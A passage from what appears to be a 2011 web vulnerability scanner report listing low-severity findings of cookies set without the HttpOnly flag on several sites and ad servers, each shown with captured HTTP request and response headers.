Expires: Fri, 24 Jun 2011 13:22:22 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="htt
...[SNIP]...
13.17. http://www.telkom-indonesia.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.telkom-indonesia.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.telkom-indonesia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 24 Jun 2011 13:15:42 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: TelkomSess=823eff40e675c70958b4b10168b76a94; path=/; domain=www.telkom-indonesia.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://beta.telkom.co.id/
Content-Length: 0
Content-Type: text/html

13.18. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:00 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Mon, 27-Jun-2011 13:31:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-24-2011-13-31-00_11394222771308922260; expires=Wed, 22-Jun-2016 13:31:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_11394222771308922260; expires=Fri, 24-Jun-2011 13:46:00 GMT; path=/; domain=c3metrics.com
Content-Length: 6651
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
13.19. http://a.netmng.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?aid=244&tax=par HTTP/1.1
Host: a.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=488b3b2b-2198-4f8a-bafb-65af73521f16; evo5_ii=rTeHHM8FxVXlMQtFpDbXwORJ34l%2Fv1YYJAemg0C6NzdfuMmQ7WJ%2F5pF%2FuEjoxoP2hR6hCc9xW5BuJ1voxxjDzHeonAdyaBOQeyplESkXfnYj7LfR14NPm2L%2FC%2F7q13jF; evo5=csmq4atf04cxa%7Cyyg8%2BAquYajlyU38mbKfM6zzAAi91YoxCASmOO%2F6vslaz3Wz6SAb7WNSoJ42tqPjZBZm%2BwU7nz%2BqSaZkPum3%2BCcVtWs4kWprLiUT69hq%2BB7egueH9fmWFooawy%2FIlN07%2FywLbqigg1lXylCtaXnEdSXrSN%2BG6wl4qKM0pyjpXM7wDjjF%2FTnaw27LAO86PDR8rVQBsHkjHYPXkvQDaVu1cNDOjedkku9rP5M4aXEKwkdj4GS5v130Su5DukdLRdsllQxY%2B7lxFgDjvyHHxdnOJN0dE%2F4NbWDBdda3%2BTZ9xk2kRE4siiSl%2FES6mcPHsh5QYNe%2B3r%2BixhOSblhWvWuhng4yHSIxh%2FdseAuHpAB4bgzwOQgOQtu6mRAPuh3ZeeWE4ftB5QnNagzzBV6tjFj2Gx16lEDbzzYwMXeK3q5f6XdSiNsf7FIJww9fjsd4IIexvm8cX3okZybYL6im77R%2Fm6D%2Biy0lxPC8bFKQsAI777CENYtplCK92RelBIxTakV2KZ9zjQZSBLVArtq%2Bd3A8brImrUXwY47CZCPMyU3E7HGBv5tRNsvK5locqtXgvWrgSFbQU%2FS7P2yi6Tu5HqAksMuAf7uFBpCtKBX0SbhRUzjxprR%2Bdzt3S5q1OPrunUWDaTyE%2FfH2xdVd9zwp8epdDU3YBru1Z4Bpl9GYvlnLLFyLJgKqp%2F2hzCYMa%2BYiQ0ZuhV1QwKhaQNvGQTe6134KX2JdCP%2BuD8wI%2FlVlbm5EPzEufUaBJmtDn8HMCishvBcS

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:10:58 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Thu, 23 Jun 2011 02:10:58 GMT
Last-Modified: Thu, 23 Jun 2011 02:10:58 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5=csmq4atf04cxa%7CcUXouB4rLUo4z%2FFKqv9TTqetSZc6URjOUkrEwZxL19iFoM3B6TaCLVGSPl4YcBy8M5VAiHvrOT0p0MJYOkmTpDIOg2x6eeiUsYim2C5zms%2BvrRLQn%2FoybFZANl57jMSeqLSZr0cDlofYcqgbyhV3RKv1yXyCctLJPQejPFuG%2FSTaq20qktFEGeqalakL5cpnxnT9tbUjhJLDFmel2Kl7C%2B5z4szEshst11JdDKJH9eq%2BoqpkDMROMNvFjfMDpfNItKW%2FvjCiL3RPcp47TxOLhJ1Q2YxLnIEZhyzUPf2LGOE6tEXu99zJEid0dKnMpG%2Bt9tIdB8UM95tAZHMW4LcN96ZflsymOkOyFv%2F1NsyGKFpkir%2Bjuwdzi7qcC%2FUA0hVVE9G7U9zUMou5%2Bbc2a66HREcxgoJ%2BDYN1%2Bhl0najue0Mcc2UFyncDi8SA02XiMCyX0QJt1ZGMqincsgjg4PvOacguI41%2FRN9FLR0lJOwU0vGk7GnXdTKda3JAzbk22zhYUV2US7JJuCxrTdVyzrTwrXTOQRiQNUhR79O7q641BJrqJ1WoKm3ej57gnXAZz6Ea6eF4VqJJZafHUjoVvCR4%2FzbKbaCZ6W6F2FV54q3JzisnJLOIeRfLB8wzZ2Yl%2Bvao5sI%2BQsCZtivHP%2BZMXU4rAiUKToqmTb9NqrSxuxywPEfo2vtC%2FlqOA09MEIfqXMW%2Bzo1PK9bgH7HezrWA467f7Y0maS7n%2FbXXPRcfp3kGW0ejb6ZBA%2B2%2F1ebBdFEbxJtE; expires=Sun, 25-Dec-2011 02:10:58 GMT; path=/; domain=.netmng.com
Content-Length: 688
Connection: close
Content-Type: text/html; charset=UTF-8


var i=document.createElement('IMG'); i.src='http://ad.doubleclick.net/activity;src=1379696;dcnet=4155;boom=38143;sz=1x1;ord=1?'; i.width=1; i.height=1; i.border=0; i.vspace=0; i.hspace=1; document.bo
...[SNIP]...
13.20. http://aboutus.ea.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://aboutus.ea.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: aboutus.ea.com
Proxy-Connection: keep-alive
Referer: http://www.info.ea.com/?pageSection=footer_corpinfo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 24 Jun 2011 13:43:28 GMT
Server: Apache
Location: http://aboutus.ea.com/home.action
Vary: Accept-Encoding
Content-Length: 241
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_DFN-XFC-DNT-HSPVQ01-Qspe 80=ffffffffc3a01d3945525d5f4f58455e445a4a422970;expires=Fri, 24-Jun-2011 17:03:14 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://aboutus.ea.com/h
...[SNIP]...
13.21. http://aboutus.ea.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://aboutus.ea.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: aboutus.ea.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_DFN-XFC-DNT-HSPVQ01-Qspe 80=ffffffffc3a01d3945525d5f4f58455e445a4a422970

Response

HTTP/1.1 404 /corporate_info_aboutus-ea-com/favicon.ico
Date: Fri, 24 Jun 2011 13:43:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Content-Length: 1090
Set-Cookie: NSC_DFN-XFC-DNT-HSPVQ01-Qspe 80=ffffffffc3a01d3945525d5f4f58455e445a4a422970;expires=Fri, 24-Jun-2011 17:03:18 GMT;path=/

<html><head><title>Apache Tomcat/6.0-snapshot - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Aria
...[SNIP]...
13.22. http://ad.doubleclick.net/click  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /click

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click;h=v8/3b30/2/0/*/a;241822308;0-0;0;64413316;933-120/600;42361883/42379670/1;;~sscs=?http://www.celebritycruises.com/specials/viewHTMLPromo.do?pagename=EuropePromotions&cS=vanity&vanity=EuropePromotion&cid=di_pgr_0601_dr11q2eu_1106_sky HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4422256122899399&output=html&h=600&slotname=7706808172&w=120&lmt=1308899798&flash=10.3.181&url=http%3A%2F%2Fwww.phuket-travel.com%2F&dt=1308921743060&bpp=3&shv=r20110615&jsv=r20110616&correlator=1308921743084&frm=4&adk=3252930215&ga_vid=643271157.1308921743&ga_sid=1308921743&ga_hid=1634133515&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&ref=http%3A%2F%2Fwww.phuket.com%2Fislands%2Findex.htm&fu=0&ifi=1&dtd=43&xpc=ynyfOlPgfP&p=http%3A//www.phuket-travel.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.celebritycruises.com/specials/viewHTMLPromo.do?pagename=EuropePromotions&cS=vanity&vanity=EuropePromotion&cid=di_pgr_0601_dr11q2eu_1106_sky
Set-Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; path=/; domain=.doubleclick.net; expires=Mon, 13 May 2013 10:09:19 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Fri, 24 Jun 2011 13:22:38 GMT
Server: GFE/2.0
Content-Type: text/html

13.23. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=1470&id=1&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nab=7; nat=1305981242875; uid2=4372bf1d7-7ad8-48eb-b49d-630d41f880f6-gnq0edmv-10~2011051519270862126421219180~59a3b184-a1c6-4aca-8101-9ed4e07fe4c6-31~3460050161923843111~375c6d96-66e4-4358-973b-0d6c0203afb3; dly2=3-lmv2b7-; dmg2=2-null7566%4051%4060+65%3A61%3A64%3ACZ+%7Cnulll%7CHHF%7CX357%7CIIG%7CQ599.055%7CS50127%7C1fbsgynlre.pbz%7CJ078%7CWfbsgynlre+grpuabybtvrf+vap.%7CLfgbjr%7CR%40527.191%7Cnull%40955%7CDoebnqonaq%7CZ%3F%7C-; hst2=3-lmv2b7-1~fkog64qf50c8~13uj~5al9~0-1~138yfzzfhnn6~136l~5hy9~1bcqu-; pct=1-oevyvt~gnyji5u3-vOrunivbe~gnyji5u2-yhpvq~gnyji5u3-; T_hbe9=c8z%3A2029o%3A1; rth=2-ll8nk2-c8z~2029o~1~1-ihn~1trsh~1~1-i6p~xuvr~1~1-d3b~wekz~1~1-5d8~ps6l~1~1-40~opiw~1~1-41~ms0a~1~1-djj~ml3p~1~1-g9a~mkwu~1~1-gfx~maxm~1~1-djc~m9g8~1~1-g9e~m8m9~1~1-dim~m821~1~1-dil~m811~1~1-icn~m7h0~1~1-icz~m7ep~1~1-gqh~m7do~1~1-iel~m79d~1~1-dlx~fde4~1~1-h4d~b20b~1~1-g96~9x0t~1~1-jd9~z20~1~1-77k~yl0~1~1-ag9~yjm~1~1-di9~3~1~1-6aq~0~1~1-

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Sat, 25 Jun 2011 02:11:00 GMT
Location: http://ads.lucidmedia.com/clicksense/pixel?id=103769&t=i
Connection: close
Set-Cookie: T_hbe9=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_cure=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_e5fw=dlx%3A232ib%3A1; Domain=trafficmp.com; Expires=Sun, 24-Jun-2012 02:11:01 GMT; Path=/
Set-Cookie: rth=2-ll8nk2-dlx~232ib~1~1-c8z~2029o~1~1-ihn~1trsh~1~1-i6p~xuvr~1~1-d3b~wekz~1~1-5d8~ps6l~1~1-40~opiw~1~1-41~ms0a~1~1-djj~ml3p~1~1-g9a~mkwu~1~1-gfx~maxm~1~1-djc~m9g8~1~1-g9e~m8m9~1~1-dim~m821~1~1-dil~m811~1~1-icn~m7h0~1~1-icz~m7ep~1~1-gqh~m7do~1~1-iel~m79d~1~1-h4d~b20b~1~1-g96~9x0t~1~1-jd9~z20~1~1-77k~yl0~1~1-ag9~yjm~1~1-di9~3~1~1-6aq~0~1~1-; Domain=trafficmp.com; Expires=Sun, 24-Jun-2012 02:11:01 GMT; Path=/
Content-Length: 0

13.24. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=754431&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh45.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; lifb=o1s9XqSS1F_lTr7; ih="b!!!!]!'4@g!!!!#=$KA3!'s4e!!!!%=)!]+!)AU6!!!!#='htn!)AU7!!!!#=(1IK!*09R!!!!#=)![q!-5BI!!!!$=$J^*!->hZ!!!!#=(6NE!-fi6!!!!#=(8L5!-fiH!!!!#=(8HV!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.#:D!!!!#='htp!.`.U!!!!#='htS!.g(t!!!!#=)!a#!.g.)!!!!%=)!^q!/!O+!!!!#=(aKx!/'y^!!!!#=(1IG!/+NP!!!!#=(aOb!/JVV!!!!'='jNd!/[[9!!!!#=$L5r!/cnt!!!!$=)!Zg!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1W4@!!!!#=(1IO!1`)_!!!!#=)![y!1e75!!!!#=%3V6!1qGe!!!!#=%1p'!1wmg!!!!#=)![j!2*,b!!!!#=(h4W!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2L<B!!!!#=(1ID!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2!2Y#q!!!!#=(aO]!2Y$+!!!!'=)!c2!2`+,!!!!#='hw!!2gH2!!!!#='i#o!2l>@!!!!#=(aKS!3$a2!!!!#=)5nT"; pv1="b!!!!/!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN!$'!_!$5*F!%1#4!1W4@!%uAQ!!!!$!?5%!*)IX>!?Q8(!(1br~~~~~~~=(1IO=*.n+!!!([!!3^d!!E)$!$XwX!/+NP!#bCp!'9kN!?5%!(glx6!w1K*!%4=%!$u!@!$F%,~~~~~=(aOb=/%Zq~!#0:.!!#6W!$a+)!2*,b!%vIB!!!!$!?5%!$Tey-![:Z-!':kx!(36D~~~~~~=(h4W~~!$$eQ!!#6W!$a+)!2*,b!%vIB!!!!$!?5%!$Tey-![:Z-!':kx!(36D~~~~~~=(h4W~~!#aQ9!!E)(!$XwW!1wmg!%+@A!!!%%!?5%!)e#I<!w1K*!%4=*!#(jY!'+(>~~~~~=)![p=-6G!~!#3yC#[gVp!$glF!1`)_!%bq`!!!!$!?5%!)e#I<!w1K*!',LB!$iom!'pCX~~~~~=)![y=-6G,~!$3Gv!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~!$3Gx!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~!$3H!!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~!$3H$!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~"; bh="b!!!%1!!!?J!!!!)='htq!!(1-!!!!-=(6NF!!*10!!!!$=(5yj!!*lZ!!!!#=$Wj6!!*oY!!!!'=(5yj!!,WM!!!!#=$Wj6!!-?2!!!!+=(5yj!!..X!!!!'=$L=p!!/GK!!!!-=(6NF!!/GR!!!!-=(6NF!!/Ju!!!!$='htq!!/K$!!!!(=(6NF!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!(=(6NF!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=):+(!!J<J!!!!.=(6NF!!J<K!!!!.=(6NF!!J<O!!!!,=(6NF!!J<S!!!!.=(6NF!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwb!!!!'=(5yj!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!.=(6NF!!j,.!!<NC=):+(!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!$=(bh!!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=):+(!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!,=(6NF!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!,=(6NF!#MTF!!!!'=%=]S!#MTH!!!!.=(6NF!#MTI!!!!.=(6NF!#MTJ!!!!.=(6NF!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!$=(6NF!#UDQ!!!!.=(6NF!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7!!!!!#=(:!J!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!$=(6NF!#]Uq!!!!$=(6NF!#]Uy!!!!$=(6NF!#]Z!!!!!*=(5yj!#]Z#!!!!'=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!#=(6NF!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!'=(6NF!#`-[!!!!'=(6NF!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!#=(6NF!#b86!!!!#=(6NF!#b87!!!!#=(6NF!#b8:!!!!#=(6NF!#b8F!!!!#=(6NF!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!#=(6NF!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!#=(6NF!#g)O!!!!#=(6NF!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!$=(6NF!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!$=(6NF!#w3